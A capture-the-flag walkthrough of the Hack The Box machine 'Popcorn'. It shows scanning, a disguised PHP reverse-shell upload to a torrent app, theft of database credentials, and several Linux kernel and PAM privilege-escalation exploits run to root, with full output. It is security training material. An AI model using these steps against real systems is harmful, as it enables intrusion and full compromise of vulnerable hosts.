Popcorn
Contents
Ports scan
u505@kali:~/HTB/Machines/Popcorn$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.6 --rate=1000
Starting masscan 1.0.5 at 2020-03-09 02:45:12 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 22/tcp on 10.10.10.6 Discovered open port 80/tcp on 10.10.10.6
u505@kali:~/HTB/Machines/Popcorn$ nmap -sC -sV 10.10.10.6 Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-08 22:45 EDT Nmap scan report for popcorn.htb (10.10.10.6) Host is up (0.057s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA) |_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA) 80/tcp open http Apache httpd 2.2.12 ((Ubuntu)) |_http-server-header: Apache/2.2.12 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.11 seconds
Web server
Dirsearch
u505@kali:~/HTB/Machines/Popcorn$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,html" -f -u http://popcorn.htb
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, html | HTTP method: get | Threads: 10 | Wordlist size: 13832
Error Log: /opt/utils/dirsearch/logs/errors-20-03-08_22-48-00.log
Target: http://popcorn.htb
[22:48:00] Starting: [22:48:00] 403 - 284B - /.html [22:48:00] 403 - 292B - /.htpasswd.txt [22:48:00] 403 - 293B - /.htpasswd.html [22:48:11] 403 - 287B - /cgi-bin/ [22:48:17] 403 - 283B - /doc/ [22:48:26] 200 - 68KB - /icons/ [22:48:26] 200 - 177B - /index.html [22:48:52] 200 - 48KB - /test/ [22:48:53] 200 - 11KB - /torrent/ [22:48:56] 403 - 293B - /server-status/
Task Completed
Test folder
The folder test shows us a phpinfo page.
Torrent folder
The folder torrent includes TorrentHoster php application.
Second run of dirsearch on folder torrent
u505@kali:~/HTB/Machines/Popcorn$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,php" -f -u http://popcorn.htb/torrent/
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, php | HTTP method: get | Threads: 10 | Wordlist size: 13832
Error Log: /opt/utils/dirsearch/logs/errors-20-03-08_23-09-12.log
Target: http://popcorn.htb/torrent/
[23:09:12] Starting: [23:09:13] 403 - 300B - /torrent/.htpasswd.txt [23:09:13] 403 - 300B - /torrent/.htpasswd.php [23:09:16] 200 - 80B - /torrent/admin/ [23:09:21] 200 - 9KB - /torrent/browse.php [23:09:21] 200 - 9KB - /torrent/browse/ [23:09:24] 200 - 936B - /torrent/comment.php [23:09:24] 200 - 936B - /torrent/comment/ [23:09:25] 200 - 0B - /torrent/config.php [23:09:25] 200 - 0B - /torrent/config/ [23:09:27] 200 - 899B - /torrent/css/ [23:09:27] 200 - 918B - /torrent/database/ [23:09:29] 200 - 0B - /torrent/download.php [23:09:29] 200 - 0B - /torrent/download/ [23:09:30] 200 - 0B - /torrent/edit.php [23:09:30] 200 - 0B - /torrent/edit/ [23:09:37] 200 - 2KB - /torrent/health/ [23:09:38] 200 - 11KB - /torrent/images/ [23:09:38] 200 - 11KB - /torrent/index.php [23:09:38] 200 - 11KB - /torrent/index/ [23:09:38] 200 - 11KB - /torrent/index.php/ [23:09:41] 200 - 1KB - /torrent/js/ [23:09:42] 200 - 2KB - /torrent/lib/ [23:09:43] 200 - 8KB - /torrent/login.php [23:09:43] 200 - 8KB - /torrent/login/ [23:09:43] 200 - 182B - /torrent/logout.php [23:09:43] 200 - 182B - /torrent/logout/ [23:09:55] 200 - 1KB - /torrent/readme/ [23:09:57] 200 - 964B - /torrent/rss.php [23:09:57] 200 - 964B - /torrent/rss/ [23:09:58] 200 - 4B - /torrent/secure.php [23:09:58] 200 - 4B - /torrent/secure/ [23:10:04] 200 - 5KB - /torrent/templates/ [23:10:05] 200 - 2KB - /torrent/thumbnail.php [23:10:05] 200 - 2KB - /torrent/thumbnail/ [23:10:05] 200 - 0B - /torrent/torrents/ [23:10:05] 200 - 6KB - /torrent/torrents.php [23:10:07] 200 - 1KB - /torrent/upload/ [23:10:07] 200 - 0B - /torrent/upload_file.php [23:10:07] 200 - 0B - /torrent/upload_file/ [23:10:07] 200 - 8KB - /torrent/upload.php [23:10:07] 200 - 80B - /torrent/users/
Task Completed
Sign up
Upload reverse shell
Once registered, the application allows us to uploads. We create a fake torrent.
u505@kali:~/HTB/Machines/Popcorn$ buildtorrent -a "http://tracker.example.com:6969/announce" u505.php.png u505.torrent
49640 : u505.php.png
hashing 1 pieces
[==================================================]
And we upload it. It takes a while to upload.
On the Torrent details, we click on edit the torrent. We want to upload a reverse shell.
u505@kali:~/HTB/Machines/Popcorn$ rlwrap nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
The screenshot file, only admits image files. On our reverse shell we add GIF89 at the beginning to manipulate the magic number of the file. And the extension is set to an image extension.
u505@kali:~/HTB/Machines/Popcorn$ head -n 2 u505.php.png GIF89<?php // php-reverse-shell - A Reverse Shell implementation in PHP
u505@kali:~/HTB/Machines/Popcorn$ grep CHANGE u505.php.png $ip = '10.10.14.28'; // CHANGE THIS $port = 4444; // CHANGE THIS
u505@kali:~/HTB/Machines/Popcorn$ file u505.php.png u505.php.png: GIF image data 28735 x 28776
Before, the upload of the file, we turn burp on to intercept the transmission.
The file name is tampered to the extension php.
Our php file has been uploaded. We can observe that the content type is image/png, the magic number of the file was image/gif, it means that the content type determination is done checking the file extension on the client side.
Browsing the folder upload, we find our uploaded file.
Clicking, on our uploaded file opens the reverse shell.
u505@kali:~/HTB/Machines/Popcorn$ rlwrap nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.6. Ncat: Connection from 10.10.10.6:58095. Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux 06:04:54 up 1:24, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: can't access tty; job control turned off $ whoami www-data $ python -c 'import pty; pty.spawn("/bin/bash")' www-data@popcorn:/$ stty raw -echo stty raw -echo
User flag
www-data@popcorn:/$ cd /home/george/ www-data@popcorn:/home/george$ cat user.txt <USER_FLAG>
MySQL enumeration
www-data@popcorn:/var/www/torrent$ cat config.php ... $CFG->host = "localhost"; $CFG->dbName = "torrenthoster"; //db name $CFG->dbUserName = "torrent"; //db username $CFG->dbPassword = "SuperSecret!!"; //db password
www-data@popcorn:/var/www/torrent$ mysql -u torrent -p Enter password: SuperSecret!!
Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 27764 Server version: 5.1.37-1ubuntu5.5 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> use torrenthoster;
mysql> select * from users; select * from users; +----+----------+----------------------------------+-----------+----------------------+---------------------+---------------------+ | id | userName | password | privilege | email | joined | lastconnect | +----+----------+----------------------------------+-----------+----------------------+---------------------+---------------------+ | 3 | Admin | d5bfedcee289e5e05b86daad8ee3e2e2 | admin | admin@yourdomain.com | 2007-01-06 21:12:46 | 2007-01-06 21:12:46 | | 5 | u505 | 02538cfd8f17efabdbe26264ead63da6 | user | abc@gmail.com | 2020-03-09 05:07:54 | 2020-03-09 05:07:54 | +----+----------+----------------------------------+-----------+----------------------+---------------------+---------------------+ 2 rows in set (0.00 sec)
We try to find the md5 by dictionary attack, but it's unsuccessfull.
u505@kali:~/HTB/Machines/Popcorn$ cat hash.txt d5bfedcee289e5e05b86daad8ee3e2e2
u505@kali:~/HTB/Machines/Popcorn$ hashcat -m 0 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ... Session..........: hashcat Status...........: Exhausted Hash.Type........: MD5 Hash.Target......: d5bfedcee289e5e05b86daad8ee3e2e2 Time.Started.....: Mon Mar 9 00:15:36 2020 (2 secs) Time.Estimated...: Mon Mar 9 00:15:38 2020 (0 secs) Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 9033.3 kH/s (2.73ms) @ Accel:1024 Loops:1 Thr:64 Vec:1 Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts Progress.........: 14344384/14344384 (100.00%) Rejected.........: 0/14344384 (0.00%) Restore.Point....: 14344384/14344384 (100.00%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: $HEX[303334323137383439] -> $HEX[042a0337c2a156616d6f732103] Hardware.Mon.#1..: Temp: 44c Util: 43% Core:1032MHz Mem:2505MHz Bus:16
Started: Mon Mar 9 00:15:32 2020 Stopped: Mon Mar 9 00:15:39 2020
Escalation of privileges
This is an old machine, with an old Ubuntu version, and an old kernel.
www-data@popcorn:/$ uname -a Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux www-data@popcorn:/home$ lsb_release -a lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 9.10 Release: 9.10 Codename: karmic
There are several ways to escalate privileges.
u505@kali:~/HTB/Machines/Popcorn$ searchsploit Ubuntu 9.10
--------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------- ----------------------------------------
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1) | exploits/linux/local/14273.sh
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2) | exploits/linux/local/14339.sh
ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9.10) - 'xattr' Local Privilege Escalati | exploits/linux/local/12130.py
Ubuntu 19.10 - Refcount Underflow and Type Confusion in shiftfs | exploits/linux/dos/47693.txt
Ubuntu 19.10 - ubuntu-aufs-modified mmap_region() Breaks Refcounting in overlayfs/shiftfs Er | exploits/linux/dos/47692.txt
--------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
- The exploit 14339 (CVE-2010-0832) is a good candidate
- The exploit 12130 (CVE-2010-1146) needs a resiferfs partition with xattr attributes mounted, and the target doesn't meet that requirement.
www-data@popcorn:/tmp$ grep reiserfs /etc/fstab
We search by kernel version.
u505@kali:~/HTB/Machines/Popcorn$ searchsploit Linux Kernel 2.6 | grep "Privilege Escalation" Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Local Privilege Escalation | exploits/linux/local/160.c Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Local Privilege Escalation (3) | exploits/linux/local/9844.py Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation | exploits/linux/local/145.c Linux Kernel 2.4.30/2.6.11.5 - BlueTooth 'bluez_sock_create' Local Privilege Escalation | exploits/linux/local/25289.c Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Local Privilege Escalation (Me | exploits/linux/local/19933.rb Linux Kernel 2.4.x/2.6.x - 'Bluez' BlueTooth Signed Buffer Index Privilege Escalation (2) | exploits/linux/local/926.c Linux Kernel 2.4.x/2.6.x - 'uselib()' Local Privilege Escalation (3) | exploits/linux/local/895.c Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (1) | exploits/linux/local/25288.c Linux Kernel 2.4/2.6 (Fedora 11) - 'sock_sendpage()' Local Privilege Escalation (2) | exploits/linux/local/9598.txt Linux Kernel 2.4/2.6 (x86-64) - System Call Emulation Privilege Escalation | exploits/linux_x86-64/local/4460.c Linux Kernel 2.4/2.6 - 'sock_sendpage()' Local Privilege Escalation (3) | exploits/linux/local/9641.txt Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation (1 | exploits/linux/local/8478.sh Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1 - Local Privilege Escalation (2) | exploits/linux/local/8572.c Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Local Privilege Escalation (1) | exploits/linux/local/33321.c Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Local Privilege Escalation | exploits/linux/local/40812.c Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation | exploits/linux/local/2031.c Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (1) | exploits/linux/local/2004.c Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (2) | exploits/linux/local/2005.c Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (3) | exploits/linux/local/2006.c Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (4) | exploits/linux/local/2011.sh Linux Kernel 2.6.17 - 'Sys_Tee' Local Privilege Escalation | exploits/linux/local/29714.txt Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2) | exploits/linux/local/5092.c Linux Kernel 2.6.17.4 - 'proc' Local Privilege Escalation | exploits/linux/local/2013.c Linux Kernel 2.6.18 < 2.6.18-20 - Local Privilege Escalation | exploits/linux/local/10613.c Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation ( | exploits/linux/local/40847.cpp Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Local Privilege Escalation (1) | exploits/linux/local/5093.c Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation | exploits/linux_x86-64/local/15024.c Linux Kernel 2.6.28/3.0 (DEC Alpha Linux) - Local Privilege Escalation | exploits/linux/local/17391.c Linux Kernel 2.6.29 - 'ptrace_attach()' Race Condition Privilege Escalation | exploits/linux/local/8678.c Linux Kernel 2.6.30 < 2.6.30.1 / SELinux (RHEL 5) - Local Privilege Escalation | exploits/linux/local/9191.txt Linux Kernel 2.6.32 (Ubuntu 10.04) - '/proc' Handling SUID Privilege Escalation | exploits/linux/local/41770.txt Linux Kernel 2.6.32 - 'pipe.c' Local Privilege Escalation (4) | exploits/linux/local/10018.sh Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1) | exploits/linux/local/25444.c Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation | exploits/linux/local/15285.c Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation | exploits/linux/local/15704.c Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2) | exploits/linux/local/35161.c Linux Kernel 2.6.x (Gentoo 2.6.29rc1) - 'ptrace_attach' Local Privilege Escalation | exploits/linux/local/8673.c Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation (1 | exploits/linux/local/25202.c Linux Kernel 2.6.x - 'pipe.c' Local Privilege Escalation (2) | exploits/linux/local/33322.c Linux Kernel 2.6.x - Ext4 'move extents' ioctl Privilege Escalation | exploits/linux/local/33395.txt Linux Kernel 2.6.x - Ptrace Privilege Escalation | exploits/linux/local/30604.c Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation | exploits/linux/local/4756.c Linux Kernel < 2.6.19 (Debian 4) - 'udp_sendmsg' Local Privilege Escalation (3) | exploits/linux/local/9575.c Linux Kernel < 2.6.19 (x86/x64) - 'udp_sendmsg' Local Privilege Escalation (2) | exploits/linux/local/9574.txt Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation | exploits/linux/local/6851.c Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation | exploits/linux/local/33523.c Linux Kernel < 2.6.29 - 'exit_notify()' Local Privilege Escalation | exploits/linux/local/8369.sh Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation (1) | exploits/linux_x86/local/15916.c Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation (2 | exploits/linux/local/15944.c Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Local Privilege Escalation | exploits/linux/local/14814.c Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation | exploits/linux_x86-64/local/15023.c Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation | exploits/linux/local/17787.c Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation | exploits/linux/local/15774.c Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation | exploits/linux/local/23674.txt
- The exploit 9844 is a race condition, the target server has only one CPU, few expectations that will work.
www-data@popcorn:/$ cat /proc/cpuinfo | grep processor processor : 0
- The exploit 15704 (CVE-2010-4258 2010-3850 2010-3849) Full Nelson should work on Ubuntu 9.10.
- The exploit 15285 (CVE-2010-3904) is a good candidate too.
- The exploit 15916 didn't work
www-data@popcorn:/tmp$ ./15916
[*] Testing Phonet support and CAP_SYS_ADMIN...
[*] You don't have CAP_SYS_ADMIN.
- The exploit 14814 didn't work neither and stalls the machine.
www-data@popcorn:/tmp$ ./14814 [+] looking for symbols... ... [+] re-smashing the shmid_kernel with exploit payload...
Linux Exploit Suggester
LES gives us, similar information, that we found manually.
u505@kali:~/HTB/Machines/Popcorn/www$ cp /usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl ./
Transfer to the target.
www-data@popcorn:/tmp$ wget http://10.10.14.28/Linux_Exploit_Suggester.pl --2020-03-10 12:14:33-- http://10.10.14.28/Linux_Exploit_Suggester.pl Connecting to 10.10.14.28:80... connected. HTTP request sent, awaiting response... 200 OK Length: 12916 (13K) [text/x-perl] Saving to: `Linux_Exploit_Suggester.pl'
100%[======================================>] 12,916 --.-K/s in 0.04s
2020-03-10 12:14:33 (296 KB/s) - `Linux_Exploit_Suggester.pl' saved [12916/12916]
Execution
www-data@popcorn:/tmp$ ./Linux_Exploit_Suggester.pl
Kernel local: 2.6.31
Possible Exploits: [+] half_nelson3 Alt: econet CVE-2010-4073 Source: http://www.exploit-db.com/exploits/17787/ [+] reiserfs CVE-2010-1146 Source: http://www.exploit-db.com/exploits/12130/ [+] pktcdvd CVE-2010-3437 Source: http://www.exploit-db.com/exploits/15150/ [+] american-sign-language CVE-2010-4347 Source: http://www.securityfocus.com/bid/45408/ [+] half_nelson Alt: econet CVE-2010-3848 Source: http://www.exploit-db.com/exploits/6851 [+] do_pages_move Alt: sieve CVE-2010-0415 Source: Spenders Enlightenment [+] pipe.c_32bit CVE-2009-3547 Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c [+] can_bcm CVE-2010-2959 Source: http://www.exploit-db.com/exploits/14814/ [+] rds CVE-2010-3904 Source: http://www.exploit-db.com/exploits/15285/ [+] ptrace_kmod2 Alt: ia32syscall,robert_you_suck CVE-2010-3301 Source: http://www.exploit-db.com/exploits/15023/ [+] half_nelson1 Alt: econet CVE-2010-3848 Source: http://www.exploit-db.com/exploits/17787/ [+] half_nelson2 Alt: econet CVE-2010-3850 Source: http://www.exploit-db.com/exploits/17787/ [+] video4linux CVE-2010-3081 Source: http://www.exploit-db.com/exploits/15024/
CVE-2010-0832 (Exploitdb 14339)
From https://nvd.nist.gov/vuln/detail/CVE-2010-0832 pam_motd (aka the MOTD module) in libpam-modules before 1.1.0-2ubuntu1.1 in PAM on Ubuntu 9.10 and libpam-modules before 1.1.1-2ubuntu5 in PAM on Ubuntu 10.04 LTS allows local users to change the ownership of arbitrary files via a symlink attack on .cache in a user's home directory, related to "user file stamps" and the motd.legal-notice file.
If we check the libpam-modules, the version is less than 1.1.0-2ubuntu1.1, so the vulnerability should work
www-data@popcorn:/tmp$ dpkg --list | grep libpam-modules
ii libpam-modules 1.1.0-2ubuntu1 Pluggable Authentication Modules for PAM
Script download
u505@kali:~/HTB/Machines/Popcorn$ wget https://raw.githubusercontent.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/master/2010/CVE-2010-0832.sh --2020-03-09 00:22:43-- https://raw.githubusercontent.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/master/2010/CVE-2010-0832.sh Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.32.133 Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.32.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 3042 (3.0K) [text/plain] Saving to: ‘CVE-2010-0832.sh’
CVE-2010-0832.sh 100%[==========================================================================>] 2.97K --.-KB/s in 0s
2020-03-09 00:22:43 (23.8 MB/s) - ‘CVE-2010-0832.sh’ saved [3042/3042]
u505@kali:~/HTB/Machines/Popcorn$ mkdir www u505@kali:~/HTB/Machines/Popcorn$ mv CVE-2010-0832.sh www/
Start web listener
u505@kali:~/HTB/Machines/Popcorn$ cd www/ u505@kali:~/HTB/Machines/Popcorn/www$ sudo python -m SimpleHTTPServer 80 [sudo] password for u505: Serving HTTP on 0.0.0.0 port 80 ...
Transfer to target
www-data@popcorn:/$ cd /tmp ww-data@popcorn:/tmp$ wget http://10.10.14.28/CVE-2010-0832.sh wget http://10.10.14.28/CVE-2010-0832.sh --2020-03-09 06:24:16-- http://10.10.14.28/CVE-2010-0832.sh Connecting to 10.10.14.28:80... connected. HTTP request sent, awaiting response... 200 OK Length: 3042 (3.0K) [text/x-sh] Saving to: `CVE-2010-0832.sh'
100%[======================================>] 3,042 --.-K/s in 0s
2020-03-09 06:24:16 (274 MB/s) - `CVE-2010-0832.sh' saved [3042/3042]
www-data@popcorn:/tmp$ chmod +x CVE-2010-0832.sh chmod +x CVE-2010-0832.sh
Execution
www-data@popcorn:/tmp$ ./CVE-2010-0832.sh ./CVE-2010-0832.sh [*] Ubuntu PAM MOTD local root [*] SSH key set up [*] spawn ssh www-data@localhost's password: dfsfsd
Permission denied, please try again. www-data@localhost's password: dsdsds
Permission denied, please try again. www-data@localhost's password: dsdsf
Permission denied (publickey,password). [-] Own /etc/passwd failed [*] SSH key removed
It fails, when the server asked for www-data password that we don't know. We retry the execution on debug mode to try to catch the issue.
www-data@popcorn:/tmp$ bash -x CVE-2010-0832.sh + P=toor:x:0:0:root:/root:/bin/bash + S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::' + echo '[*] Ubuntu PAM MOTD local root' [*] Ubuntu PAM MOTD local root ++ which ssh + '[' -z /usr/bin/ssh ']' ++ which ssh-keygen + '[' -z /usr/bin/ssh-keygen ']' ++ ps -u root ++ grep sshd + '[' -z ' 1046 ? 00:00:00 sshd' ']' ++ mktemp -u + KEY=/tmp/tmp.bymVMnm2JH + key_create + backup /var/www/.ssh/authorized_keys + '[' -e /var/www/.ssh/authorized_keys ']' + '[' -e /var/www/.ssh/authorized_keys ']' + return 0 + ssh-keygen -q -t rsa -N -C pam -f /tmp/tmp.bymVMnm2JH + '[' '!' -d /var/www/.ssh ']' + mv /tmp/tmp.bymVMnm2JH.pub /var/www/.ssh/authorized_keys + echo '[*] SSH key set up' [*] SSH key set up + backup /var/www/.cache + '[' -e /var/www/.cache ']' + '[' -e /var/www/.cache ']' + return 0 + own /etc/passwd + '[' -e /var/www/.cache ']' + ln -s /etc/passwd /var/www/.cache + echo '[*] spawn ssh' [*] spawn ssh + ssh -o 'NoHostAuthenticationForLocalhost yes' -i /tmp/tmp.bymVMnm2JH localhost true www-data@localhost's password: fddf
Permission denied, please try again. www-data@localhost's password: fdfd
Permission denied, please try again. www-data@localhost's password: fddf
Permission denied (publickey,password). + '[' -w /etc/passwd ']' + echo '[-] Own /etc/passwd failed' [-] Own /etc/passwd failed + restore /var/www/.cache + '[' -e /var/www/.cache ']' + rm -rf /var/www/.cache + '[' -e /var/www/.cache.bak ']' + return 0 + bye + key_remove + rm -f /tmp/tmp.bymVMnm2JH + restore /var/www/.ssh/authorized_keys + '[' -e /var/www/.ssh/authorized_keys ']' + rm -rf /var/www/.ssh/authorized_keys + '[' -e /var/www/.ssh/authorized_keys.bak ']' + return 0 + echo '[*] SSH key removed' [*] SSH key removed + exit 1
The script creates a ssh key for user www-data, but when ssh tries to login with the private key, it falls back on password.
www-data@popcorn:/tmp$ ls -ld /var/www/.ssh/ drwxrwxrwx 2 www-data www-data 4096 Mar 9 07:11 /var/www/.ssh/ www-data@popcorn:/tmp$ chmod 700 /var/www/.ssh/ www-data@popcorn:/tmp$ ls -ld /var/www/.ssh/ drwx------ 2 www-data www-data 4096 Mar 9 07:11 /var/www/.ssh/
The rights of the folder .ssh were wide open, and ssh doesn't allow it. Once corrected, the script can login on ssh with the private key and apply the vulnerability.
www-data@popcorn:/tmp$ bash CVE-2010-0832.sh [*] Ubuntu PAM MOTD local root [*] SSH key set up [*] spawn ssh [+] owned: /etc/passwd [*] spawn ssh [+] owned: /etc/shadow [*] SSH key removed [+] Success! Use password toor to get root Password: toor
root@popcorn:/tmp# whoami root
Full Nelson (ExploitDB 15704 CVE-2010-4258 CVE-2010-3850 CVE-2010-3849)
u505@kali:~/HTB/Machines/Popcorn/www$ searchsploit -m 15704
Exploit: Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/15704
Path: /usr/share/exploitdb/exploits/linux/local/15704.c
File Type: C source, ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Popcorn/www/15704.c
Transfer to target
www-data@popcorn:/tmp$ wget http://10.10.14.28/15704.c --2020-03-10 11:16:08-- http://10.10.14.28/15704.c Connecting to 10.10.14.28:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9487 (9.3K) [text/plain] Saving to: `15704.c'
100%[======================================>] 9,487 --.-K/s in 0.04s
2020-03-10 11:16:08 (217 KB/s) - `15704.c' saved [9487/9487]
Compilation and execution
www-data@popcorn:/tmp$ gcc 15704.c -o 15704
www-data@popcorn:/tmp$ ./15704 [*] Resolving kernel addresses... [+] Resolved econet_ioctl to 0xf8431280 [+] Resolved econet_ops to 0xf8431360 [+] Resolved commit_creds to 0xc01645d0 [+] Resolved prepare_kernel_cred to 0xc01647d0 [*] Calculating target... [*] Triggering payload... [*] Got root! # whoami root
CVE-2010-3904 (ExploitDB 15285)
From: https://nvd.nist.gov/vuln/detail/CVE-2010-3904 The rds_page_copy_user function in net/rds/page.c in the Reliable Datagram Sockets (RDS) protocol implementation in the Linux kernel before 2.6.36 does not properly validate addresses obtained from user space, which allows local users to gain privileges via crafted use of the sendmsg and recvmsg system calls. u505@kali:~/HTB/Machines/Popcorn/www$ searchsploit -m 15285 Exploit: Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation URL: https://www.exploit-db.com/exploits/15285 Path: /usr/share/exploitdb/exploits/linux/local/15285.c File Type: C source, ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Popcorn/www/15285.c
Push the source code to the target.
www-data@popcorn:/tmp$ wget http://10.10.14.28/15285.c --2020-03-10 11:31:54-- http://10.10.14.28/15285.c Connecting to 10.10.14.28:80... connected. HTTP request sent, awaiting response... 200 OK Length: 7155 (7.0K) [text/plain] Saving to: `15285.c'
100%[======================================>] 7,155 --.-K/s in 0.04s
2020-03-10 11:31:54 (160 KB/s) - `15285.c' saved [7155/7155]
Compilation and execution.
www-data@popcorn:/tmp$ gcc 15285.c -o 15285
www-data@popcorn:/tmp$ ./15285
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc089b908
[+] Resolved default_security_ops to 0xc075e2a0
[+] Resolved cap_ptrace_traceme to 0xc02caf30
[+] Resolved commit_creds to 0xc01645d0
[+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# whoami
root
Dirty Cow (CVE-2016-5195 ExploitDB 40839)
The last exploit I tried on this box is dirty cow.
From https://nvd.nist.gov/vuln/detail/CVE-2016-5195 Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka "Dirty COW."
u505@kali:~/HTB/Machines/Popcorn/www$ searchsploit dirty cow
--------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
